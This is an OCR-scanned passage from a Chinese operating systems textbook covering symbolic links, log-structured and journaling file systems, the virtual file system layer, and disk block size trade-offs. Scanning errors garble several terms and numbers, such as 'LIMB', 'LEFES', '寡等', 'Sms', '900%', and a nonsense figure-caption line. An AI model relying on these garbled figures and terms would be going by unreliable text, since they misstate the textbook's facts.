对 于 符号 链接 ， 以 上 问题 不 会 发 生 ， 因 为 只 有 真正 的 文件 所 有 者 才 有 一 个 指向 i 节 点 的 指针 。 链 接 到 
该 文件 上 的 用 户 只 有 路 径 名 ,没有 指向 i 节点 的 指针 。 当 文件 所 有 者 删除 文件 时 ， 该 文件 被 销毁 。 以 后 若 
试图 通过 符号 链接 访问 该 文件 将 导致 失败 ， 因 为 系统 不 能 找到 该 文件 。 删 除 符号 链接 根本 不 影响 该 文件 。 

符号 链接 的 问题 是 需要 额外 的 开销 。 必 须 读 取 包 含 路 径 的 文件 ， 然 后 要 一 个 部 分 一 个 部 分 地 扫描 路 
径 ， 直 到 找到 i 节点 。 这 些 操 作 也 许 需要 很 多 次 额外 的 磁盘 访问 。 此 外 ， 每 个 符号 链接 都 需要 额外 的 i 节 
点 ， 以 及 额外 的 一 个 磁盘 块 用 于 存储 路 径 ， 虽 然 如 果 路 径 名 很 短 ， 作 为 一 种 优化 ， 系 统 可 以 将 它 存储 在 
i 节 点 中 。 符 号 链接 有 一 个 优势 ， 即 只 要 简单 地 提供 一 个 机 器 的 网 络 地 址 以 及 文件 在 该 机 器 上 驻 留 的 路 
径 ， 就 可 以 链接 全 球 任何 地 方 的 机 器 上 的 文件 。 

还 有 另 一 个 由 链接 带 来 的 问题 ， 在 符号 链接 和 其 他 方式 中 都 存在 。 如 果 人 允许 链接 ， 文 件 有 两 个 或 多 
个 路 径 。 查 找 一 指定 目录 及 其 子 目录 下 的 全 部 文件 的 程序 将 多 次 定位 到 被 链接 的 文件 。 例 如 ， 一 个 将 某 
一 目录 及 其 子 目 录 下 的 文件 转 储 到 磁带 上 的 程序 有 可 能 多 次 复制 一 个 被 链接 的 文件 。 进 而 ， 如 果 接 着 把 
磁带 读 进 另 一 台 机 器 ， 除 非 转 储 程序 具有 智能 ， 否 则 被 链接 的 文件 将 被 两 次 复制 到 磁盘 上 ， 而 不 是 只 是 
被 链接 起 来 。 


4.3.5 日 志 结 构 文件 系统 

不 断 进步 的 科技 给 现 有 的 文件 系统 带 来 了 更 多 的 压力 。 特 别 是 CPU 的 运行 速度 越 来 越 快 ， 磁 盘 容 量 
越 来 越 大 ， 价 格 也 越 来 越 便宜 (但 是 磁盘 速度 并 没有 增 快 多 少 )， 同 时 内 存 容量 也 以 指数 形式 增长 。 而 
没有 得 到 快速 发 展 的 参数 是 磁盘 的 寻 道 时 间 (除了 固态 盘 ， 因 为 固态 盘 没 有 寻 道 时 间 )。 所 以 这 些 问题 
综合 起 来 ， 便 成 为 影响 很 多 文件 系统 性 能 的 一 个 瓶颈 。 为 此 ，Berkeley 设 计 了 一 种 全 新 的 文件 系统 ， 试 
图 缓解 这 个 问题 ， 即 日 志 结构 文件 系统 (Log-structured File System，LFS)。 在 这 一 节 里 ,我 们 简要 描 
述 LFS 是 如 何 工作 的 。 如 果 需 要 了 解 更 多 相关 知识 ， 请 参阅 (Rosenblum 和 Ousterhout，1991 ) 。 

促使 设计 LFS 的 主要 原因 是 ，CPU 的 运行 速度 越 来 越 快 ，RAM 内 存 容量 变 得 更 大 ， 同 时 磁盘 高 速 组 
存 也 迅速 地 增加 。 进 而 ， 不 需要 磁盘 访问 操作 ， 就 有 可 能 满足 直接 来 自 文 件 系 统 高 速 缓存 的 很 大 一 部 分 
读 请 求 。 从 上 面 的 事实 可 以 推出 ， 未 来 多 数 的 磁盘 访问 是 写 操作 ， 这 样 ， 在 一 些 文件 系统 中 使 用 的 提前 
读 机 制 (需要 读 取 数据 之 前 预 取 磁 盘 块 )， 并 不 能 获得 更 好 的 性 能 。 

更 为 糟糕 的 情况 是 ， 在 大 多 数 文件 系统 中 ， 写 操作 往往 都 是 零碎 的 。 一 个 50ks 的 磁盘 写 操作 之 前 通 
常 需 要 10ms 的 寻 道 时 间 和 4ms 的 旋转 延迟 时 间 ， 可 见 零 碎 的 磁盘 写 操作 是 极其 没有 效率 的 。 根 据 这 些 参 
数 ， 磁 盘 的 利用 率 降低 到 1% 以 下 。 

为 了 看 看 这 样 小 的 零碎 写 操作 从 何 而 来 ， 考 虑 在 UNIX 文 件 系 统 上 创建 一 个 新 文件 。 为 了 写 这 个 文 
件 ， 必 须 写 该 文件 目录 的 节点、 目录 块 、 文 件 的 i 节点 以 及 文件 本 身 。 而 这 些 写 操作 都 有 可 能 被 延迟 ， 
那么 如 果 在 写 操作 完成 之 前 发 生死 机 ， 就 可 能 在 文件 系统 中 造成 严重 的 不 一 致 性 。 正 因为 如 此 ，i 节 点 
的 写 操作 一 般 是 立即 完成 的 。 

出 于 这 一 原因 ，LFS 的 设计 者 决定 重新 实现 一 种 UNIX 文 件 系 统 ， 该 系统 即使 面 对 一 个 大 部 分 由 零 
碎 的 随机 写 操作 组 成 的 任务 ， 同 样 能 够 充分 利用 磁盘 的 带宽 。 其 基本 思想 是 将 整个 磁盘 结构 化 为 一 个 日 
志 。 每 隔 一 段 时 间 ， 或 是 有 特殊 需要 时 ， 被 缓冲 在 内 存 中 的 所 有 未 决 的 写 操作 都 被 放 到 一 个 单独 的 段 中 ， 
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作为 在 日 志 末尾 的 一 个 邻接 段 写 和 磁盘。 这 个 单独 的 段 可 能 会 包括 i 节 点 、 目 录 块 、 数 据 块 或 者 都 有 。 
每 一 个 段 的 开始 都 是 该 段 的 摘要 ， 说 明 该 段 中 都 包含 哪些 内 容 。 如 果 所 有 的 段 平 均 在 LIMB 左 右 ， 那 么 就 
几乎 可 以 利用 磁盘 的 完整 带宽 。 

在 LFS 的 设计 中 ， 同 样 存在 着 i 节点 ， 且 具有 与 UNIX 中 一 样 的 结构 ， 但 是 i 节点 分 散在 整个 日 志 中 ， 
而 不 是 放 在 磁盘 的 某 一 个 固定 位 置 。 尽 管 如 此 ， 当 一 个 i 节点 被 定位 后 ， 定 位 一 个 块 就 用 通常 的 方式 来 
完成 。 当 然 ， 由 于 这 种 设计 ， 要 在 磁盘 中 找到 一 个 i 节点 就 变 得 比较 困难 了 ， 因 为 节点 的 地 址 不 能 像 在 
UNIX 中 那样 简单 地 通过 计算 得 到 。 为 了 能 够 找到 i 节点 ， 必 须要 维护 一 个 由 i 节点 编号 索引 组 成 的 i 节点 
图 。 在 这 个 图 中 的 表 项 i 指向 磁盘 中 的 第 i 个 i 节点。 这 个 图 保存 在 磁盘 上 ， 但 是 也 保存 在 高 速 缓存 中 ， 因 
此 ， 大 多 数 情况 下 这 个 图 的 最 常用 部 分 还 是 在 内 存 中 。 

总 而 言 之 ， 所 有 的 写 操作 最 初 都 被 缓冲 在 内 存 中 ， 然 后 周期 性 地 把 所 有 已 缓冲 的 写作 为 一 个 单独 的 
段 ,在 日 志 的 末尾 处 写 入 磁盘 。 要 打开 一 个 文件 ， 则 首先 需要 从 i 节点 图 中 找到 文件 的 节点。 一 旦 i 节点 
定位 之 后 就 可 以 找到 相应 的 块 的 地 址 。 所 有 的 块 都 放 在 段 中 ， 在 日 志 的 某 个 位 置 上 。 

如 果 磁 盘 空 间 无 限 大 ， 那 么 有 了 前 面 的 讨论 就 足够 了 。 但 是 ， 实 际 的 硬盘 空间 是 有 限 的 ， 这 样 最 终 
日 志 将 会 占用 整个 磁盘 ， 到 那个 时 候 将 不 能 往日 志 中 写 任何 新 的 段 。 幸 运 的 是 ， 许 多 已 有 的 段 包含 了 很 
多 不 再 需要 的 块 ， 例 如 ， 如 果 一 个 文件 被 覆盖 了 ， 那 么 它 的 i 节 点 就 会 指向 新 的 块 ， 但 是 旧 的 磁盘 块 仍 
然 在 先前 写 和 的 段 中 占据 着 空间 。 

为 了 解决 这 个 问题 ，LEFES 有 一 个 清理 线程 ， 该 清理 线程 周期 地 扫描 日 志 进 行 磁盘 压缩 。 该 线程 首先 读 
日 志 中 的 第 一 个 段 的 摘要 ， 检 查 有 哪些 i 节点 和 文件 。 然 后 该 线程 查看 当前 i 节点 图 ， 判 断 该 节点 是 否 有 效 
以 及 文件 块 是 否 仍 在 使 用 中 。 如 果 没 有 使 用 ， 则 该 信息 被 丢弃 。 如 果 仍 然 使 用 ， 那 么 节点 和 块 就 进入 内 
存 等 待 写 回 到 下 一 个 段 中 。 接 着 ， 原 来 的 段 被 标记 为 空闲 ， 以 便 日 志 可 以 用 它 来 存放 新 的 数据 。 用 这 种 
方法 ， 清 理 线程 遍历 日 志 ， 从 后 面 移 走 旧 的 段 ， 然 后 将 有 效 的 数据 放 入 内 存 等 待 写 到 下 一 个 段 中 。 由 此 ， 
整个 磁盘 成 为 一 个 大 的 环形 的 缓冲 区 ， 写 线程 将 新 的 段 写 到 前 面 ， 而 清理 线程 则 将 旧 的 段 从 后 面 移 走 。 

日 志 的 管理 并 不 简单 ， 因 为 当 一 个 文件 块 被 写 回 到 一 个 新 段 的 时 候 ， 该 文件 的 i 节 点 (在 日 志 的 某 
个 地 方 ) 必须 首先 要 定位 、 更 新 ， 然 后 放 到 内 存 中 准备 写 回 到 下 一 个 段 中 。i 节 点 图 接着 必须 更 新 以 指 
向 新 的 位 置 。 尽 管 如 此 ， 对 日 志 进 行 管理 还 是 可 行 的 ， 而 且 性 能 分 析 的 结果 表明 ， 这 种 由 管理 而 带 来 的 
复杂 性 是 值得 的 。 在 上 面 所 引用 文章 中 的 测试 数据 表明 ，LFS 在 处 理 大 量 的 零碎 的 写 操作 时 性 能 上 比 
UNIX 好 上 一 个 数量 级 ， 而 在 读 和 大 块 写 操作 的 性 能 方面 并 不 比 UNIX 文 件 系统 差 ， 甚 至 更 好 。 


4.3.6 日 志文 件 系统 

虽然 基于 日 志 结 构 的 文件 系统 是 一 个 很 吸引 人 的 想法 ， 但 是 由 于 它们 和 现 有 的 文件 系统 不 相 匹配 ， 所 
以 还 设 有 被 广泛 应 用 。 尽 管 如 此 ， 它 们 内 在 的 一 个 思想 ， 即 面 对 出 错 的 鲁 棒 性 ， 却 可 以 被 其 他 文件 系统 所 借 
鉴 。 这 里 的 基本 想法 是 保存 一 个 用 于 记录 系统 下 一 步 将 要 做 什么 的 日 志 。 这 样 当 系统 在 完成 它们 即将 完成 的 
任务 前 崩溃 时 ， 重 新 启动 后 ， 可 以 通过 查看 日 志 ， 获 取 崩 溃 前 计划 完成 的 任务 ， 并 完成 它们 。 这 样 的 文件 系 
统 被 称 为 日 志文 件 系 统 ， 并 已 经 被 实际 应 用 。 微 软 (Microsoft) 的 NTFS 文 件 系统 、Linux ext3 和 ReiserFS 文 
件 系 统 都 使 用 日 志 。OS X 将 日 志文 件 系 统 作为 可 选项 提供 。 接 下 来 ， 我 们 会 对 这 一 主题 进行 简短 介绍 。 

为 了 看 清 这 个 问题 的 实质 ， 考 虑 一 个 简单 、 普 通 并 经 常 发 生 的 操作 : 移 除 文件 。 这 个 操作 (在 
UNIX 中 ) 需要 三 个 步骤 完成 ， 

1) 在 目录 中 删除 文件 ， 

2) 释放 i 节 点 到 空闲 i 节 点 池 ， 

3) 将 所 有 磁盘 块 归还 空闲 磁盘 块 池 。 
在 Windows 中 ， 也 需要 类 似 的 步骤 。 不 存在 系统 崩溃 时 ， 这 些 步 骤 执 行 的 顺序 不 会 带 来 问题 ， 但 是 当 存 
在 系统 崩溃 时 ， 就 会 带 来 问题 。 假 如 在 第 一 步 完 成 后 系统 崩溃 。i 节 点 和 文件 块 将 不 会 被 任何 文件 获得 ， 
也 不 会 被 再 分 配 ， 它 们 只 存在 于 废物 地 中 的 某 个 地 方 ， 并 因此 减少 了 可 利用 的 资源 。 如 果 崩 溃 发 生 在 第 
二 步 后 ， 那 么 只 有 磁盘 块 会 丢失 。 

如 果 操 作 顺 序 被 更 改 ， 并 且 i 节 点 最 先 被 释放 ， 这 样 在 系统 重启 后 ，i 节 点 可 以 被 再 分 配 ， 但 是 旧 的 
目录 入 口 将 继续 指向 它 ， 因 此 指向 错误 文件 。 如 果 磁 盘 块 最 先 被 释放 ， 这 样 一 个 在 i 节点 被 清除 前 的 系 
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统 崩溃 将 意味 着 一 个 有 效 的 目录 入 口 指向 一 个 i 节 点 ， 它 所 列 出 的 磁盘 块 当前 存在 于 空闲 块 存储 字 中 并 
可 能 很 快 被 再 利用 。 这 将 导致 两 个 或 更 多 的 文件 分 享 同 样 的 磁盘 块 。 这 样 的 结果 都 是 不 好 的 。 

日 志文 件 系统 则 先 写 一 个 日 志 项 ， 列 出 三 个 将 要 完成 的 动作 。 然 后 日 志 项 被 写 和 磁盘 (HEATA 
好 地 实施 ， 可 能 从 磁盘 读 回来 验证 它 的 完整 性 ) 。 只 有 当日 志 项 已 经 被 写 人 ， 不 同 的 操作 才 可 以 进行 。 
当 所 有 的 操作 成 功 完 成 后 ， 擦 除 日 志 项 。 如 果 系 统 这 时 崩溃 ， 系 统 恢复 后 ， 文 件 系统 可 以 通过 检查 日 志 
来 查看 是 不 是 有 未 完成 的 操作 。 如 果 有 ， 可 以 重新 运行 所 有 未 完成 的 操作 (这 个 过 程 在 系统 崩溃 重复 发 
生 时 执行 多 次 )， 直 到 文件 被 正确 地 删除 。 

为 了 让 日 志文 件 系 统 工作 ， 被 写 信 日志 的 操作 必须 是 替 等 的 ， 它 意味 着 只 要 有 必要 ， 它 们 就 可 以 重 
复 执行 很 多 次 ， 并 不 会 带 来 破坏 。 像 操作 “更 新 位 表 并 标记 i 节 点 k 或 者 块 " 是 空闲 的 ”可 以 重复 任意 次 。 
同样 地 ， 查 找 一 个 目录 并 且 删 除 所 有 叫 foobar 的 项 也 是 寡 等 的 。 相 反 ， 把 从 地 点 k 新 释放 的 块 加 入 空闲 
表 的 末端 不 是 智 等 的 ， 因 为 它们 可 能 已 经 被 释放 并 存放 在 那里 了 。 更 复杂 的 操作 如 “查找 空闲 块 列表 并 
且 如 果 块 "不 在 列表 就 将 块 za 加 入 ”是 寡 等 的 。 日 志文 件 系 统 必须 安排 它们 的 数据 结构 和 可 写 和 人 日志 的 操 
作 以 使 它们 都 是 寡 等 的 。 在 这 些 条 件 下 ， 骨 溃 恢复 可 以 被 快速 安全 地 实施 。 

为 了 增加 可 靠 性 ， 一 个 文件 系统 可 以 引入 数据 库 中 原子 事务 (atomic transaction) 的 概念 。 使 用 这 
个 概念 ， 一 组 动作 可 以 被 界定 在 开始 事务 和 结束 事务 操作 之 间 。 这 样 ， 文 件 系 统 就 会 知道 它 或 者 必须 完 
成 所 有 被 界定 的 操作 ， 或 者 什么 也 不 做 ， 而 没有 其 他 选择 。 

NTFS 有 一 个 扩展 的 日 志文 件 系 统 ， 并 且 它 的 结构 几乎 不 会 因 系 统 崩 省 而 受到 破坏 。 自 1993 年 NTFS 
第 一 次 随 Windows NT 一 起 发 行 以 来 就 在 不 断 地 发 展 。Linux 上 有 日 志 功 能 的 第 一 个 文件 系统 是 ReiserFS ， 
但 是 因为 它 和 后 来 标准 化 的 ext2 文 件 系统 不 相 匹配 ， 它 的 推广 受到 阻碍 。 相 比 之 下 ，ext3 一 一 一 个 不 像 
ReiserFS 那 么 有 野心 的 工程 ， 也 具有 日 志文 件 功能 并 且 和 之 前 的 ext2 系 统 可 以 共存 。 


4.3.7 虚拟 文件 系统 

即使 在 同一 台 计 算 机 上 或 在 同一 个 操作 系统 下 ， 都 会 使 用 很 多 不 同 的 文件 系统 。Windows 有 一 
个 主要 的 NTFS 文 件 系统 ， 但 是 也 有 一 个 包含 老 的 但 仍然 使 用 的 FAT-32 或 者 FAT-16 驱 动 器 或 分 区 ， 并 
且 不 时 地 需要 一 个 CD-ROM 或 者 DVD (每 一 个 包含 特定 的 文件 系统 ) 。Windows 通 过 指定 不 同 的 盘 符 
来 处 理 这 些 不 同 的 文件 系统 ， 比 如 “C:"”“D:” 等 。 当 一 个 进程 打开 一 个 文件 ， 盘 符 是 显 式 或 者 隐 式 
存在 的 ， 所 以 Windows 知 道 向 哪个 文件 系统 传递 请 求 ， 不 需要 尝试 将 不 同类 型 文件 系统 整合 为 统一 的 
模式 。 

相 比 之 下 ， 所 有 现代 的 UNIX 系 统 做 了 一 个 很 认真 的 尝试 ， 即 将 多 种 文件 系统 整合 到 一 个 统一 的 结 
构 中 。 一 个 Linux 系 统 可 以 用 ext2 作 为 根 文件 系统 ，ext3 分 区 装载 在 /usr 下 ， 另 一 块 采用 ReiserFS 文 件 系 
统 的 硬盘 装载 在 /home 下， 以 及 一 个 ISO 9660 的 CD-ROM 临 时 装载 在 /mnt 下 。 从 用 户 的 观点 来 看 ， 只 有 
一 个 文件 系统 层级 。 它 们 事实 上 是 多 种 (不 相 容 的 ) 文件 系统 ， 对 于 用 户 和 进程 是 不 可 见 的 。 

但 是 ， 多 种 文件 系统 的 存在 ， 在 实际 应 用 中 是 明确 可 见 的 ， 而 且 因为 以 前 Sun 公 司 (Kleiman, 1986) 
所 做 的 工作 ， 绝 大 多 数 UNIX 操 作 系 统 都 使 
用 虚拟 文件 系统 (Virtual File System, VFS) 
概念 尝试 将 多 种 文件 系统 统一 成 一 个 有 序 的 
结构 。 关 键 的 思想 就 是 抽象 出 所 有 文件 系统 
都 共有 的 部 分 , ,并 且 将 这 部 分 代码 放 在 单独 
的 一 层 ， 该 层 调 用 底层 的 实际 文件 系统 来 具 
体 管理 数据 。 大 体 上 的 结构 在 图 4-18 中 有 并 
述 。 以 下 的 介绍 不 是 单独 针对 Linux 和 
FreeBSD 或 者 其 他 版 本 的 UNIX， 而 是 给 出 
了 一 种 普遍 的 关于 UNIX 下 文件 系统 的 描述 。 

所 有 和 文件 相关 的 系统 调用 在 最 初 的 处 理 上 都 指向 虚拟 文件 系统 。 这 些 来 自用 户 进程 的 调用 ， 都 是 
标准 的 POSIX 系 统 调用 ， 比 如 open、read、write 和 Iseek 等 。 因 此 ，VFS 对 用 户 进 程 有 一 个 “上 层 ” 接 
口 ， 它 就 是 著名 的 POSIX 接 口 。 








图 4-18 虚拟 文件 系统 的 位 置 
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VFS 也 有 一 个 对 于 实际 文件 系统 的 “下 层 ” 接 口 ， 就 是 在 图 4-18 中 被 标记 为 VFS 接 口 的 部 分 。 这 个 
接口 包含 许多 功能 调用 ， 这 样 VFS 可 以 使 每 一 个 文件 系统 完成 任务 。 因 此 ， 当 创造 一 个 新 的 文件 系统 和 
VFS 一 起 工作 时 ， 新 文件 系统 的 设计 者 就 必须 确定 它 提供 VFS 所 需要 的 功能 调用 。 关 于 这 个 功能 的 一 个 
明显 的 例子 就 是 从 磁盘 中 读 某 个 特定 的 块 ， 把 它 放 在 文件 系统 的 高 速 缓 冲 中 ， 并 且 返 回 指向 它 的 指针 。 
因此 ，VFS 有 两 个 不 同 的 接口 : 上 层 给 用 户 进程 的 接口 和 下 层 给 实际 文件 系统 的 接口 。 

尽管 VFS 下 大 多 数 的 文件 系统 体现 了 本 地 磁盘 的 划分 ， 但 并 不 总 是 这 样 。 事 实 上 ，Sun 建 立 虚 拟 文 
件 系统 最 原始 的 动机 是 支持 使 用 NEFS (Network File System， 网 络 文件 系统 ) 协议 的 远程 文件 系统 。 
VEFS 设 计 是 只 要 实际 的 文件 系统 提供 VFS 需 要 的 功能 ，VFS 就 不 需 知道 或 者 关心 数据 具体 存储 在 什么 地 
方 或 者 底层 的 文件 系统 是 什么 样 的 。 . 

大 多 数 VFS 应 用 本 质 上 都 是 面向 对 象 的 ， 即 便 它 们 用 C 语 言 而 不 是 C++ 编写 。 有 几 种 通常 支持 的 主 
要 的 对 象 类 型 ， 包 括 超 块 (描述 文件 系统 ) 、v 节 点 (描述 文件 ) 和 目录 (描述 文件 系统 目录 )。 这 些 中 
的 每 一 个 都 有 实际 文件 系统 必须 支持 的 相关 操作 。 另 外 ，VFS 有 一 些 供 它 自己 使 用 的 内 部 数据 结构 ， 包 
括 用 于 跟踪 用 户 进程 中 所 有 打开 文件 的 装载 表 和 文件 描述 符 的 数组 。 

为 了 理解 VFS 是 如 何 工作 的 ， 让 我 们 按时 间 的 先后 运行 一 个 实例 。 当 系统 启动 时 ， 根 文件 系统 在 
VFS 中 注册 。 另 外 ， 当 装载 其 他 文件 系统 时 ， 不 管 在 启动 时 还 是 在 操作 过 程 中 ， 它 们 也 必须 在 VFS 中 注 
册 。 当 一 个 文件 系统 注册 时 ， 它 做 的 最 基本 的 工作 就 是 提供 一 个 包含 VFS 所 需要 的 函数 地 址 的 列表 ， 可 
以 是 一 个 长 的 调用 矢量 (K), 或 者 是 许多 这 样 的 矢量 (如 果 VFS 需 要 )， 每 个 VFS 对 象 一 个 。 因 此 ， 只 
要 一 个 文件 系统 在 VFS 注 册 ，VFS 就 知道 如 何 从 它 那里 读 一 个 块 一 一 它 从 文件 系统 提供 的 矢量 中 直接 调 
用 第 4 个 (或 者 任何 一 个 ) 功能 。 同 样 地 ，VFS 也 知道 如 何 执 行 实 际 文件 系统 提供 的 每 一 个 其 他 的 功能 : 
它 只 需 调用 某 个 功能 ， 该 功能 所 在 的 地 址 在 文件 系统 注册 时 就 提供 了 。 

装载 文件 系统 后 就 可 以 使 用 它 了 。 比 如 ， 如 果 一 个 文件 系统 装载 在 /usr 并 且 一 个 进程 调用 它 : 

open("/usr/include/unistd.h", O_RDONLY) 


当 解 析 路 径 时 ，VFS 看 到 新 的 文件 系统 被 装载 在 /usr， 并 且 通 过 搜索 已 经 装载 文件 系统 的 超 块 表 来 确定 
它 的 超 块 。 做 完 这 些 ， 它 可 以 找到 它 所 装载 的 文件 的 根 目录 ， 在 那里 查找 路 径 include/unistd.h。 然 后 
VFS 创 建 一 个 v 节 点 并 调用 实际 文件 系统 ， 以 返回 所 有 的 在 文件 i 节点 中 的 信息 。 这 个 信息 和 其 他 信息 一 
起 复制 到 v 节 点 中 (在 RAM 中 )， 而 这 些 所 谓 其 他 信息 中 最 重要 的 是 指向 包含 调用 v 节 点 操作 的 函数 表 的 
指针 ， 比 如 read、write 和 close 等 。 

当 v 节 点 被 创建 以 后 ， 为 了 进程 调用 ，VFS 在 文件 描述 符 表 中 创建 一 个 表 项 ， 并 且 将 它 指向 新 的 v 节 
点 (为 了 简单 ， 文 件 描述 符 实 际 上 指向 另 一 个 包含 当前 文件 位 置 和 指向 v 节 点 的 指针 的 数据 结构 ， 但 是 
这 个 细节 对 于 我 们 这 里 的 陈述 并 不 重要 )。 最 后 ，VFS 向 调用 者 返回 文件 描述 符 ， 所 以 调用 者 可 以 用 它 
去 读 、 写 或 者 关闭 文件 。 

随后 ， 当 进程 用 文件 描述 符 进行 一 个 读 操 作 ，VFS 通 过 进程 表 和 文件 描述 符 表 确定 v 节 点 的 位 置 ， 
并 跟随 指针 指向 函数 表 (所 有 这 些 都 是 被 请 求 文件 所 在 的 实际 文件 系统 中 的 地 址 )。 这 样 就 调用 了 处 理 
read 的 函数 ， 运 行 在 实际 文件 系统 中 的 代码 并 得 到 所 请 求 的 块 。VFS 并 不 知道 数据 是 来 源 于 本 地 硬盘 ， 
还 是 来 源 于 网 络 中 的 远程 文件 系统 、CD-ROM、USB 存 储 棒 或 者 其 他 介质 。 所 有 有 关 的 数据 结构 在 图 
4-19 中 展示 。 从 调用 者 进程 号 和 文件 描述 符 开始 ， 进 而 是 v 节 点 ， 读 函数 指针 ， 然 后 是 对 实际 文件 系统 
的 访问 函数 定位 。 

通过 这 种 方法 ， 加 入 新 的 文件 系统 变 得 相当 直接 。 为 了 加 入 一 个 文件 系统 ， 设 计 者 首先 获得 一 
个 VFS 期 待 的 功能 调用 的 列表 ， 然 后 编写 文件 系统 实现 这 些 功 能 。 或 者 ， 如 果 文 件 系统 已 经 存在 ， 
它们 必须 提供 VFS 需 要 的 包装 功能 ， 通 常 通 过 建造 一 个 或 者 多 个 内 在 的 指向 实际 文件 系统 的 调用 来 
实现 。 
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图 4-19 VFS 和 实际 文件 系统 进行 读 操作 所 使 用 的 数据 结构 和 代码 的 简化 视图 


4.4 文件 系统 管理 和 优化 


要 使 文件 系统 工作 是 一 件 事 ， 使 真实 世界 中 的 文件 系统 有 效 、 重 棒 地 工作 是 另 一 回 事 。 本 节 中 ， 我 
们 将 考察 有 关 管 理 磁盘 的 一 些 问题 。 


4.4.1 磁盘 空间 管理 

文件 通常 存放 在 磁盘 上 ， 所 以 对 磁盘 空间 的 管理 是 系统 设计 者 要 考虑 的 一 个 主要 问题 。 存 储 一 个 有 
n 个 字 节 的 文件 可 以 有 两 种 策略 : 分配" 个 字 节 的 连续 磁盘 空间 ， 或 者 把 文件 分 成 很 多 个 连续 (或 并 不 一 
定 连续 ) 的 块 。 在 存储 管理 系统 中 ， 分 段 处 理 和 分 页 处 理 之 间 也 要 进行 同样 的 权衡 。 

正如 我 们 已 经 见 到 的 ， 按 连续 字 节 序列 存储 文件 有 一 个 明显 问题 ， 当 文件 扩大 时 ， 有 可 能 需要 在 磁 
盘 上 移动 文件 。 内 存 中 分 段 也 有 同样 的 问题 。 不 同 的 是 ， 相 对 于 把 文件 从 磁盘 的 一 个 位 置 移动 到 另 一 个 
位 置 ， 内 存 中 段 的 移动 操作 要 快 得 多 。 因 此 ， 几 乎 所 有 的 文件 系统 都 把 文件 分 割 成 固定 大 小 的 块 来 存储 ， 
各 块 之 间 不 一 定 相 邻 。 

1. 块 大 小 

一 旦 决定 把 文件 按 固定 大 小 的 块 来 存储 ， 就 会 出 现 一 个 问题 : 块 的 大 小 应 该 是 多 少 ? 按照 磁盘 组 织 
方式 ， 扇 区、 磁道 和 柱 面 显然 都 可 以 作为 分 配 单位 〈 虽 然 它 们 都 与 设备 相关 ， 这 是 一 种 负面 因素 ) E 
分 页 系统 中 ， 页 面 大 小 也 是 主要 讨论 的 问题 之 一 。 

拥有 大 的 块 尺 寸 意味 着 每 个 文件 ， 甚 至 一 个 1 字 节 的 文件 ， 都 要 占用 一 整个 柱 面 ， 也 就 是 说 小 的 文 
件 浪费 了 大 量 的 磁盘 空间 。 另 一 方面 ， 小 的 块 尺寸 意味 着 大 多 数 文件 会 跨越 多 个 块 ， 因 此 需要 多 次 寻 道 
与 旋转 延迟 才能 读 出 它们 ， 从 而 降低 了 性 能 。 因 此 ， 如 果 分 配 的 单元 太 大 ， 则 浪费 了 空间 ， 如 果 太 小 ， 
则 浪费 时 间 。 

做 出 一 个 好 的 决策 需要 知道 有 关 文 件 大 小 的 尺寸 分 布 信息 。Tanenbaum 等 人 (2006) 给 出 了 1984 年 
及 2005 年 在 一 所 大 型 研究 型 大 学 (VU) 的 计算 机 系 以 及 一 个 政治 网 站 (www.electoral-vote.com) 的 商 
业 网 络 服务 器 上 研究 的 文件 大 小 分 布 数 据 。 结 果 显 示 在 图 4-20， 其 中 ， 对 于 每 个 2 的 寡 文 件 大 小 ， 在 3 个 
数据 集 里 每 一 数据 集中 的 所 有 小 于 等 于 这 个 值 的 文件 所 占 的 百分比 被 列 了 出 来 。 例 如 ， 在 2005 年 ， 
59.13% 的 VU 的 文件 是 4 区 B 或 更 小 ， 且 90.84% 的 文件 是 64KB 或 更 小 ， 其 文件 大 小 的 中 位 数 是 2475 字 节 。 
一 些 人 可 能 会 因为 这 么 小 的 尺寸 而 感到 吃惊 。 
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图 4-20 小 于 某 个 给 定 值 〈 字 节 ) 的 文件 的 百分比 


我 们 能 从 这 些 数据 中 得 出 什么 结论 呢 ?” 如 果 块 大 小 是 1KB， 则 只 有 30%~50% 的 文件 能 够 放 在 一 个 
块 内 ,但 如 果 块 大 小 是 4KB， 这 一 比例 将 上 升 到 60%~70%。 那 篇 论文 中 的 其 他 数据 显示 ， 如 果 块 大 小 是 
4KB， 则 93% 的 磁盘 块 会 被 10% 最 大 的 文件 使 用 。 这 意味 着 在 每 个 小 文件 末尾 浪费 一 些 空间 几乎 不 会 有 
任何 关系 ， 因 为 磁盘 被 少量 的 大 文件 (视频 ) 给 占用 了 ， 并 且 小 文件 所 占 空间 的 总 量 根 本 就 无 关 紧 要 ， 
其 至 将 那 900% 最 小 的 文件 所 占 的 空间 翻 一 倍 也 不 会 引 人 注 目 。 

另 一 方面 , 分 配 单 位 很 小 意味 着 每 个 文件 由 很 多 块 组 成 , 每 读 一 块 都 有 寻 道 和 旋转 延迟 时 间 ， 所 以 ， 
读 取 由 很 多 小 块 组 成 的 文件 会 非常 慢 。 

举例 说 明 ， 假 设 磁盘 每 道 有 1MB ， 其 旋转 时 间 为 8.33ms， 平 均 寻 道 时 间 为 Sms。 以 毫秒 (ms) 为 单 
位 ， 读 取 一 个 k 个 字 节 的 块 所 需要 的 时 间 是 寻 道 时 间 、 旋 转 延 迟 和 传送 时 间 之 和 : 

5+ 4.165 + (k/ 1 000 000) x 8.33 


图 4-21 的 虚线 表示 一 个 磁盘 的 数据 率 与 块 
大 小 之 间 的 函数 关系 。 要 计算 空间 利用 率 ， 则 
要 对 文件 的 平均 大 小 做 出 假设 。 为 简单 起 见 ， 
假设 所 有 文件 都 是 4KB。 尽 管 这 个 数据 稍微 大 于 
在 VU 测量 得 到 的 数据 ， 但 是 学 生 们 大 概 应 该 有 
比 公司 数据 中 心 更 多 的 小 文件 ， 所 以 这 样 整体 
上 也 许 更 好 些 。 图 4-21 中 的 实 线 表示 作为 盘 块 大 
小 函数 的 空间 利用 率 。 ee ~ 

可 以 按 下 面 的 方式 理解 这 两 条 曲线 。 对 一 TKOT CAKE TEKET MRE en 
个 块 的 访问 时 间 完 全 由 寻 道 时 间 和 旋转 延迟 所 图 4.21 虚线 (左边 标 度 ) 给 出 磁盘 数据 率 ， 实 线 (右边 标 
Es MUTE em Ra NO a, 度 ) 给 出 磁盘 空间 利用 率 (所 有 文件 大 小 均 为 4KB) 
那么 取 的 数据 越 多 越 好 。 因 此 ， 数 据 率 随 着 磁 
盘 块 的 增 大 而 线性 增 大 (直到 传输 花费 很 长 的 时 间 以 至 于 传输 时 间 成 为 主导 因素 ) 。 

现在 考虑 空间 利用 率 。 对 于 4KB 文 件 和 1KB、2KB 或 4KB 的 磁盘 块 ， 这 个 文件 分 别 使 用 4、2、1 块 
